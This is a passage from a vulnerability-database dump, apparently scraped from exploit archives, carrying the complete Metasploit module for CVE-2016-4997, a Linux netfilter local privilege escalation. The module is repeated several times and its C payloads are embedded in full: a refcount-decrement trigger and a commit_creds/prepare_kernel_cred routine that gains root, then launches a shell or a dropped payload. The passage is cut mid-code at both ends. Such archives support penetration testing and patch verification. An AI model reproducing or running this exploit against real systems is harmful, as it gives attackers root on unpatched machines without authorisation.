<fcntl.h>\r\n #include <sys/mman.h>\r\n\r\n #define MALLOC_SIZE 66*1024\r\n\r\n int decr(void *p) {\r\n int sock, optlen;\r\n int ret;\r\n void *data;\r\n struct ipt_replace *repl;\r\n struct ipt_entry *entry;\r\n struct xt_entry_match *ematch;\r\n struct xt_standard_target *target;\r\n unsigned i;\r\n\r\n sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);\r\n\r\n if (sock == -1) {\r\n perror(\"socket\");\r\n return -1;\r\n }\r\n\r\n data = malloc(MALLOC_SIZE);\r\n\r\n if (data == NULL) {\r\n perror(\"malloc\");\r\n return -1;\r\n }\r\n\r\n memset(data, 0, MALLOC_SIZE);\r\n\r\n repl = (struct ipt_replace *) data;\r\n repl->num_entries = 1;\r\n repl->num_counters = 1;\r\n repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;\r\n repl->valid_hooks = 0;\r\n\r\n entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));\r\n entry->target_offset = 74; // overwrite target_offset\r\n entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);\r\n\r\n 
ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));\r\n\r\n strcpy(ematch->u.user.name, \"icmp\");\r\n void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);\r\n uint64_t *me = (uint64_t *)(kmatch + 0x58);\r\n *me = 0xffffffff821de10d; // magic number!\r\n\r\n uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);\r\n *match = (uint32_t)kmatch;\r\n\r\n ematch->u.match_size = (short)0xffff;\r\n\r\n target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);\r\n uint32_t *t = (uint32_t *)target;\r\n *t = (uint32_t)kmatch;\r\n\r\n printf(\"[!] Decrementing the refcount. This may take a while...\\n\");\r\n printf(\"[!] Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\");\r\n\r\n for (i = 0; i < 0xffffff/2+1; i++) {\r\n ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);\r\n }\r\n\r\n close(sock);\r\n free(data);\r\n printf(\"[+] Done! Now run ./pwn\\n\");\r\n\r\n return 0;\r\n }\r\n\r\n int main(void) {\r\n void *stack;\r\n int ret;\r\n\r\n printf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\");\r\n\r\n ret = unshare(CLONE_NEWUSER);\r\n\r\n if (ret == -1) {\r\n perror(\"unshare\");\r\n return -1;\r\n }\r\n\r\n stack = (void *) malloc(65536);\r\n\r\n if (stack == NULL) {\r\n perror(\"malloc\");\r\n return -1;\r\n }\r\n\r\n clone(decr, stack + 65536, CLONE_NEWNET, NULL);\r\n\r\n sleep(1);\r\n\r\n return 0;\r\n }\r\n }\r\n\r\n # direct copy of code from exploit-db\r\n pwn = %q{\r\n #include <stdio.h>\r\n #include <string.h>\r\n #include <errno.h>\r\n #include <unistd.h>\r\n #include <stdint.h>\r\n #include <fcntl.h>\r\n #include <sys/mman.h>\r\n #include <assert.h>\r\n\r\n #define MMAP_ADDR 0xff814e3000\r\n #define MMAP_OFFSET 0xb0\r\n\r\n typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);\r\n typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t 
cred);\r\n\r\n void __attribute__((regparm(3))) privesc() {\r\n commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;\r\n prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;\r\n commit_creds(prepare_kernel_cred((uint64_t)NULL));\r\n }\r\n\r\n int main() {\r\n void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);\r\n assert(payload == (void *)MMAP_ADDR);\r\n\r\n void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);\r\n\r\n memset(shellcode, 0, 0x300000);\r\n\r\n void *ret = memcpy(shellcode, &privesc, 0x300);\r\n assert(ret == shellcode);\r\n\r\n printf(\"[+] Escalating privs...\\n\");\r\n\r\n int fd = open(\"/dev/ptmx\", O_RDWR);\r\n close(fd);\r\n\r\n assert(!getuid());\r\n\r\n printf(\"[+] We've got root!\");\r\n\r\n return execl(\"/bin/bash\", \"-sh\", NULL);\r\n }\r\n }\r\n\r\n # the original code printed a line. However, this is hard to detect due to threading.\r\n # so instead we can write a file in /tmp to catch.\r\n decr.gsub!(/printf\\(\"\\[\\+\\] Done\\! 
Now run \\.\\/pwn\\\\n\"\\);/,\r\n \"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" )\r\n\r\n # patch in to run our payload\r\n pwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/,\r\n \"execl(\\\"#{payload_path}\\\", NULL);\")\r\n\r\n def pwn(payload_path, pwn_file, pwn, compile)\r\n # lets write our payload since everythings set for priv esc\r\n vprint_status(\"Writing payload to #{payload_path}\")\r\n write_file(payload_path, generate_payload_exe)\r\n cmd_exec(\"chmod 555 #{payload_path}\")\r\n register_file_for_cleanup(payload_path)\r\n\r\n # now lets drop part 2, and finish up.\r\n rm_f pwn_file\r\n if compile\r\n print_status \"Writing pwn executable to #{pwn_file}.c\"\r\n rm_f \"#{pwn_file}.c\"\r\n write_file(\"#{pwn_file}.c\", pwn)\r\n cmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\")\r\n register_file_for_cleanup(\"#{pwn_file}.c\")\r\n else\r\n print_status \"Writing pwn executable to #{pwn_file}\"\r\n write_file(pwn_file, pwn)\r\n end\r\n register_file_for_cleanup(pwn_file)\r\n cmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\")\r\n end\r\n\r\n if not compile # we need to override with our pre-created binary\r\n # pwn file\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')\r\n fd = ::File.open( path, \"rb\")\r\n pwn = fd.read(fd.stat.size)\r\n fd.close\r\n # desc file\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')\r\n fd = ::File.open( path, \"rb\")\r\n decr = fd.read(fd.stat.size)\r\n fd.close\r\n\r\n # overwrite the hardcoded variable names in the compiled versions\r\n env_ready_file = '/tmp/okDjTFSS'\r\n payload_path = '/tmp/2016_4997_payload'\r\n end\r\n\r\n # check for shortcut\r\n if datastore['REEXPLOIT']\r\n pwn(payload_path, pwn_file, pwn, compile)\r\n else\r\n rm_f desc_file\r\n if compile\r\n print_status \"Writing desc executable to #{desc_file}.c\"\r\n rm_f \"#{desc_file}.c\"\r\n 
write_file(\"#{desc_file}.c\", decr)\r\n register_file_for_cleanup(\"#{desc_file}.c\")\r\n output = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\")\r\n else\r\n write_file(desc_file, decr)\r\n end\r\n rm_f env_ready_file\r\n register_file_for_cleanup(env_ready_file)\r\n #register_file_for_cleanup(desc_file)\r\n if not file_exist?(desc_file)\r\n vprint_error(\"gcc failure output: #{output}\")\r\n fail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\")\r\n end\r\n if target.name == \"Ubuntu\"\r\n vprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\"\r\n elsif target.name == \"Fedora\"\r\n vprint_status \"Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created.\"\r\n end\r\n cmd_exec(\"chmod +x #{desc_file}; #{desc_file}\")\r\n sec_waited = 0\r\n\r\n until sec_waited > datastore['MAXWAIT'] do\r\n Rex.sleep(1)\r\n if sec_waited % 10 == 0\r\n vprint_status(\"Waited #{sec_waited}s so far\")\r\n end\r\n\r\n if file_exist?(env_ready_file)\r\n print_good(\"desc finished, env ready.\")\r\n pwn(payload_path, pwn_file, pwn, compile)\r\n return\r\n end\r\n sec_waited +=1\r\n end\r\n end\r\n end\r\nend\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26412"}], "packetstorm": [{"lastseen": "2016-12-05T22:12:53", "description": "", "published": "2016-09-27T00:00:00", "type": "packetstorm", "title": "Linux Kernel 4.6.3 Netfilter Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-09-27T00:00:00", "id": "PACKETSTORM:138854", "href": "https://packetstormsecurity.com/files/138854/Linux-Kernel-4.6.3-Netfilter-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## 
\n \nrequire \"msf/core\" \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation', \n'Description' => %q{ \nThis module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently \nonly works against Ubuntu 16.04 (not 16.04.1) with kernel \n4.4.0-21-generic. \nSeveral conditions have to be met for successful exploitation: \nUbuntu: \n1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) \n2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile \nKernel 4.4.0-31-generic and newer are not vulnerable. \n \nWe write the ascii files and compile on target instead of locally since metasm bombs for not \nhaving cdefs.h (even if locally installed) \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'h00die <mike@stcyrsecurity.com>', # Module \n'vnik' # Discovery \n], \n'DisclosureDate' => 'Jun 03 2016', \n'Platform' => [ 'linux'], \n'Arch' => [ ARCH_X86 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => \n[ \n[ 'Ubuntu', { } ] \n#[ 'Fedora', { } ] \n], \n'DefaultTarget' => 0, \n'References' => \n[ \n[ 'EDB', '40049'], \n[ 'CVE', '2016-4997'], \n[ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c'] \n] \n)) \nregister_options( \n[ \nOptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]), \nOptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]), \nOptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]), \nOptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]) \n], self.class) 
\nend \n \ndef check \ndef iptables_loaded?() \n# user@ubuntu:~$ cat /proc/modules | grep ip_tables \n# ip_tables 28672 1 iptable_filter, Live 0x0000000000000000 \n# x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000 \nvprint_status('Checking if ip_tables is loaded in kernel') \nif target.name == \"Ubuntu\" \niptables = cmd_exec('cat /proc/modules | grep ip_tables') \nif iptables.include?('ip_tables') \nvprint_good('ip_tables.ko is loaded') \nelse \nprint_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command') \nend \nreturn iptables.include?('ip_tables') \nelsif target.name == \"Fedora\" \niptables = cmd_exec('cat /proc/modules | grep iptable_raw') \nif iptables.include?('iptable_raw') \nvprint_good('iptable_raw is loaded') \nelse \nprint_error('iptable_raw is not loaded. root needs to run iptables -L or similar command') \nend \nreturn iptables.include?('iptable_raw') \nelse \nreturn false \nend \nend \n \ndef shemsham_installed?() \n# we want this to be false. \nvprint_status('Checking if shem or sham are installed') \nshemsham = cmd_exec('cat /proc/cpuinfo') \nif shemsham.include?('shem') \nprint_error('shem installed, system not vulnerable.') \nelsif shemsham.include?('sham') \nprint_error('sham installed, system not vulnerable.') \nelse \nvprint_good('shem and sham not present.') \nend \nreturn (shemsham.include?('shem') or shemsham.include?('sham')) \nend \n \nif iptables_loaded?() and not shemsham_installed?() \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \ndef exploit \n# first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version. 
\ndef has_prereqs?() \nvprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed') \nif target.name == \"Ubuntu\" \nlib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386') \nif lib.include?('install') \nvprint_good('libc6-dev-i386 is installed') \nelse \nprint_error('libc6-dev-i386 is not installed. Compiling will fail.') \nend \nmultilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib') \nif multilib.include?('install') \nvprint_good('gcc-multilib is installed') \nelse \nprint_error('gcc-multilib is not installed. Compiling will fail.') \nend \ngcc = cmd_exec('which gcc') \nif gcc.include?('gcc') \nvprint_good('gcc is installed') \nelse \nprint_error('gcc is not installed. Compiling will fail.') \nend \nreturn gcc.include?('gcc') && lib.include?('install') && multilib.include?('install') \nelsif target.name == \"Fedora\" \nlib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'') \nif lib.include?('glibc') \nvprint_good('glibc-devel.i686 is installed') \nelse \nprint_error('glibc-devel.i686 is not installed. Compiling will fail.') \nend \nif lib.include?('libgcc') \nvprint_good('libgcc.i686 is installed') \nelse \nprint_error('libgcc.i686 is not installed. Compiling will fail.') \nend \nmultilib = false #not implemented \ngcc = false #not implemented \nreturn (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib \nelse \nreturn false \nend \nend \n \ncompile = false \nif datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' \nif has_prereqs?() \ncompile = true \nvprint_status('Live compiling exploit on system') \nelse \nvprint_status('Dropping pre-compiled exploit on system') \nend \nend \nif check != CheckCode::Appears \nfail_with(Failure::NotVulnerable, 'Target not vulnerable! 
punt!') \nend \n \ndesc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) \nenv_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) \npwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) \npayload_file = rand_text_alpha(8) \npayload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\" \n \n# direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here \n# removed #include <netinet/in.h> per busterb comment in PR 7326 \ndecr = %q{ \n#define _GNU_SOURCE \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n#include <sched.h> \n#include <netinet/in.h> \n#include <linux/sched.h> \n#include <errno.h> \n#include <sys/types.h> \n#include <sys/socket.h> \n#include <sys/ptrace.h> \n#include <net/if.h> \n#include <linux/netfilter_ipv4/ip_tables.h> \n#include <linux/netlink.h> \n#include <fcntl.h> \n#include <sys/mman.h> \n \n#define MALLOC_SIZE 66*1024 \n \nint decr(void *p) { \nint sock, optlen; \nint ret; \nvoid *data; \nstruct ipt_replace *repl; \nstruct ipt_entry *entry; \nstruct xt_entry_match *ematch; \nstruct xt_standard_target *target; \nunsigned i; \n \nsock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); \n \nif (sock == -1) { \nperror(\"socket\"); \nreturn -1; \n} \n \ndata = malloc(MALLOC_SIZE); \n \nif (data == NULL) { \nperror(\"malloc\"); \nreturn -1; \n} \n \nmemset(data, 0, MALLOC_SIZE); \n \nrepl = (struct ipt_replace *) data; \nrepl->num_entries = 1; \nrepl->num_counters = 1; \nrepl->size = sizeof(*repl) + sizeof(*target) + 0xffff; \nrepl->valid_hooks = 0; \n \nentry = (struct ipt_entry *) (data + sizeof(struct ipt_replace)); \nentry->target_offset = 74; // overwrite target_offset \nentry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target); \n \nematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry)); \n \nstrcpy(ematch->u.user.name, 
\"icmp\"); \nvoid *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0); \nuint64_t *me = (uint64_t *)(kmatch + 0x58); \n*me = 0xffffffff821de10d; // magic number! \n \nuint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4); \n*match = (uint32_t)kmatch; \n \nematch->u.match_size = (short)0xffff; \n \ntarget = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8); \nuint32_t *t = (uint32_t *)target; \n*t = (uint32_t)kmatch; \n \nprintf(\"[!] Decrementing the refcount. This may take a while...\\n\"); \nprintf(\"[!] Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\"); \n \nfor (i = 0; i < 0xffffff/2+1; i++) { \nret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024); \n} \n \nclose(sock); \nfree(data); \nprintf(\"[+] Done! Now run ./pwn\\n\"); \n \nreturn 0; \n} \n \nint main(void) { \nvoid *stack; \nint ret; \n \nprintf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\"); \n \nret = unshare(CLONE_NEWUSER); \n \nif (ret == -1) { \nperror(\"unshare\"); \nreturn -1; \n} \n \nstack = (void *) malloc(65536); \n \nif (stack == NULL) { \nperror(\"malloc\"); \nreturn -1; \n} \n \nclone(decr, stack + 65536, CLONE_NEWNET, NULL); \n \nsleep(1); \n \nreturn 0; \n} \n} \n \n# direct copy of code from exploit-db \npwn = %q{ \n#include <stdio.h> \n#include <string.h> \n#include <errno.h> \n#include <unistd.h> \n#include <stdint.h> \n#include <fcntl.h> \n#include <sys/mman.h> \n#include <assert.h> \n \n#define MMAP_ADDR 0xff814e3000 \n#define MMAP_OFFSET 0xb0 \n \ntypedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred); \ntypedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred); \n \nvoid __attribute__((regparm(3))) privesc() { \ncommit_creds_fn commit_creds = (void *)0xffffffff810a21c0; \nprepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0; \ncommit_creds(prepare_kernel_cred((uint64_t)NULL)); \n} \n 
\nint main() { \nvoid *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0); \nassert(payload == (void *)MMAP_ADDR); \n \nvoid *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET); \n \nmemset(shellcode, 0, 0x300000); \n \nvoid *ret = memcpy(shellcode, &privesc, 0x300); \nassert(ret == shellcode); \n \nprintf(\"[+] Escalating privs...\\n\"); \n \nint fd = open(\"/dev/ptmx\", O_RDWR); \nclose(fd); \n \nassert(!getuid()); \n \nprintf(\"[+] We've got root!\"); \n \nreturn execl(\"/bin/bash\", \"-sh\", NULL); \n} \n} \n \n# the original code printed a line. However, this is hard to detect due to threading. \n# so instead we can write a file in /tmp to catch. \ndecr.gsub!(/printf\\(\"\\[\\+\\] Done\\! Now run \\.\\/pwn\\\\n\"\\);/, \n\"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" ) \n \n# patch in to run our payload \npwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/, \n\"execl(\\\"#{payload_path}\\\", NULL);\") \n \ndef pwn(payload_path, pwn_file, pwn, compile) \n# lets write our payload since everythings set for priv esc \nvprint_status(\"Writing payload to #{payload_path}\") \nwrite_file(payload_path, generate_payload_exe) \ncmd_exec(\"chmod 555 #{payload_path}\") \nregister_file_for_cleanup(payload_path) \n \n# now lets drop part 2, and finish up. 
\nrm_f pwn_file \nif compile \nprint_status \"Writing pwn executable to #{pwn_file}.c\" \nrm_f \"#{pwn_file}.c\" \nwrite_file(\"#{pwn_file}.c\", pwn) \ncmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\") \nregister_file_for_cleanup(\"#{pwn_file}.c\") \nelse \nprint_status \"Writing pwn executable to #{pwn_file}\" \nwrite_file(pwn_file, pwn) \nend \nregister_file_for_cleanup(pwn_file) \ncmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\") \nend \n \nif not compile # we need to override with our pre-created binary \n# pwn file \npath = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out') \nfd = ::File.open( path, \"rb\") \npwn = fd.read(fd.stat.size) \nfd.close \n# desc file \npath = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out') \nfd = ::File.open( path, \"rb\") \ndecr = fd.read(fd.stat.size) \nfd.close \n \n# overwrite the hardcoded variable names in the compiled versions \nenv_ready_file = '/tmp/okDjTFSS' \npayload_path = '/tmp/2016_4997_payload' \nend \n \n# check for shortcut \nif datastore['REEXPLOIT'] \npwn(payload_path, pwn_file, pwn, compile) \nelse \nrm_f desc_file \nif compile \nprint_status \"Writing desc executable to #{desc_file}.c\" \nrm_f \"#{desc_file}.c\" \nwrite_file(\"#{desc_file}.c\", decr) \nregister_file_for_cleanup(\"#{desc_file}.c\") \noutput = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\") \nelse \nwrite_file(desc_file, decr) \nend \nrm_f env_ready_file \nregister_file_for_cleanup(env_ready_file) \n#register_file_for_cleanup(desc_file) \nif not file_exist?(desc_file) \nvprint_error(\"gcc failure output: #{output}\") \nfail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\") \nend \nif target.name == \"Ubuntu\" \nvprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\" \nelsif target.name == \"Fedora\" \nvprint_status \"Executing #{desc_file}, may take around 80s to finish. 
Watching for #{env_ready_file} to be created.\" \nend \ncmd_exec(\"chmod +x #{desc_file}; #{desc_file}\") \nsec_waited = 0 \n \nuntil sec_waited > datastore['MAXWAIT'] do \nRex.sleep(1) \nif sec_waited % 10 == 0 \nvprint_status(\"Waited #{sec_waited}s so far\") \nend \n \nif file_exist?(env_ready_file) \nprint_good(\"desc finished, env ready.\") \npwn(payload_path, pwn_file, pwn, compile) \nreturn \nend \nsec_waited +=1 \nend \nend \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/138854/netfilter_priv_esc.rb.txt"}, {"lastseen": "2016-12-05T22:17:47", "description": "", "published": "2016-11-23T00:00:00", "type": "packetstorm", "title": "Linux Kernel 4.6.3 Netfilter Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-11-23T00:00:00", "id": "PACKETSTORM:139880", "href": "https://packetstormsecurity.com/files/139880/Linux-Kernel-4.6.3-Netfilter-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire \"msf/core\" \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation', \n'Description' => %q{ \nThis module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently \nonly works against Ubuntu 16.04 (not 16.04.1) with kernel \n4.4.0-21-generic. \nSeveral conditions have to be met for successful exploitation: \nUbuntu: \n1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) \n2. 
libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile \nKernel 4.4.0-31-generic and newer are not vulnerable. \n \nWe write the ascii files and compile on target instead of locally since metasm bombs for not \nhaving cdefs.h (even if locally installed) \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'h00die <mike@stcyrsecurity.com>', # Module \n'vnik' # Discovery \n], \n'DisclosureDate' => 'Jun 03 2016', \n'Platform' => [ 'linux'], \n'Arch' => [ ARCH_X86 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => \n[ \n[ 'Ubuntu', { } ] \n#[ 'Fedora', { } ] \n], \n'DefaultTarget' => 0, \n'References' => \n[ \n[ 'EDB', '40049'], \n[ 'CVE', '2016-4997'], \n[ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c'] \n] \n)) \nregister_options( \n[ \nOptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]), \nOptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]), \nOptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]), \nOptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]) \n], self.class) \nend \n \ndef check \ndef iptables_loaded?() \n# user@ubuntu:~$ grep ip_tables /proc/modules \n# ip_tables 28672 1 iptable_filter, Live 0x0000000000000000 \n# x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000 \nvprint_status('Checking if ip_tables is loaded in kernel') \nif target.name == \"Ubuntu\" \niptables = read_file('/proc/modules') \nif iptables.include?('ip_tables') \nvprint_good('ip_tables.ko is loaded') \nelse \nprint_error('ip_tables.ko is not loaded. 
root needs to run iptables -L or similar command') \nend \nreturn iptables.include?('ip_tables') \nelsif target.name == \"Fedora\" \niptables = read_file('/proc/modules') \nif iptables.include?('iptable_raw') \nvprint_good('iptable_raw is loaded') \nelse \nprint_error('iptable_raw is not loaded. root needs to run iptables -L or similar command') \nend \nreturn iptables.include?('iptable_raw') \nelse \nreturn false \nend \nend \n \ndef shemsham_installed?() \n# we want this to be false. \nvprint_status('Checking if shem or sham are installed') \nshemsham = read_file('/proc/cpuinfo') \nif shemsham.include?('shem') \nprint_error('shem installed, system not vulnerable.') \nelsif shemsham.include?('sham') \nprint_error('sham installed, system not vulnerable.') \nelse \nvprint_good('shem and sham not present.') \nend \nreturn (shemsham.include?('shem') or shemsham.include?('sham')) \nend \n \nif iptables_loaded?() and not shemsham_installed?() \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \ndef exploit \n# first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version. \ndef has_prereqs?() \nvprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed') \nif target.name == \"Ubuntu\" \nlib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386') \nif lib.include?('install') \nvprint_good('libc6-dev-i386 is installed') \nelse \nprint_error('libc6-dev-i386 is not installed. Compiling will fail.') \nend \nmultilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib') \nif multilib.include?('install') \nvprint_good('gcc-multilib is installed') \nelse \nprint_error('gcc-multilib is not installed. Compiling will fail.') \nend \ngcc = cmd_exec('which gcc') \nif gcc.include?('gcc') \nvprint_good('gcc is installed') \nelse \nprint_error('gcc is not installed. 
Compiling will fail.') \nend \nreturn gcc.include?('gcc') && lib.include?('install') && multilib.include?('install') \nelsif target.name == \"Fedora\" \nlib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'') \nif lib.include?('glibc') \nvprint_good('glibc-devel.i686 is installed') \nelse \nprint_error('glibc-devel.i686 is not installed. Compiling will fail.') \nend \nif lib.include?('libgcc') \nvprint_good('libgcc.i686 is installed') \nelse \nprint_error('libgcc.i686 is not installed. Compiling will fail.') \nend \nmultilib = false #not implemented \ngcc = false #not implemented \nreturn (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib \nelse \nreturn false \nend \nend \n \ncompile = false \nif datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' \nif has_prereqs?() \ncompile = true \nvprint_status('Live compiling exploit on system') \nelse \nvprint_status('Dropping pre-compiled exploit on system') \nend \nend \nif check != CheckCode::Appears \nfail_with(Failure::NotVulnerable, 'Target not vulnerable! 
punt!') \nend \n \ndesc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) \nenv_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) \npwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) \npayload_file = rand_text_alpha(8) \npayload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\" \n \n# direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here \n# removed #include <netinet/in.h> per busterb comment in PR 7326 \ndecr = %q{ \n#define _GNU_SOURCE \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n#include <sched.h> \n#include <netinet/in.h> \n#include <linux/sched.h> \n#include <errno.h> \n#include <sys/types.h> \n#include <sys/socket.h> \n#include <sys/ptrace.h> \n#include <net/if.h> \n#include <linux/netfilter_ipv4/ip_tables.h> \n#include <linux/netlink.h> \n#include <fcntl.h> \n#include <sys/mman.h> \n \n#define MALLOC_SIZE 66*1024 \n \nint decr(void *p) { \nint sock, optlen; \nint ret; \nvoid *data; \nstruct ipt_replace *repl; \nstruct ipt_entry *entry; \nstruct xt_entry_match *ematch; \nstruct xt_standard_target *target; \nunsigned i; \n \nsock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); \n \nif (sock == -1) { \nperror(\"socket\"); \nreturn -1; \n} \n 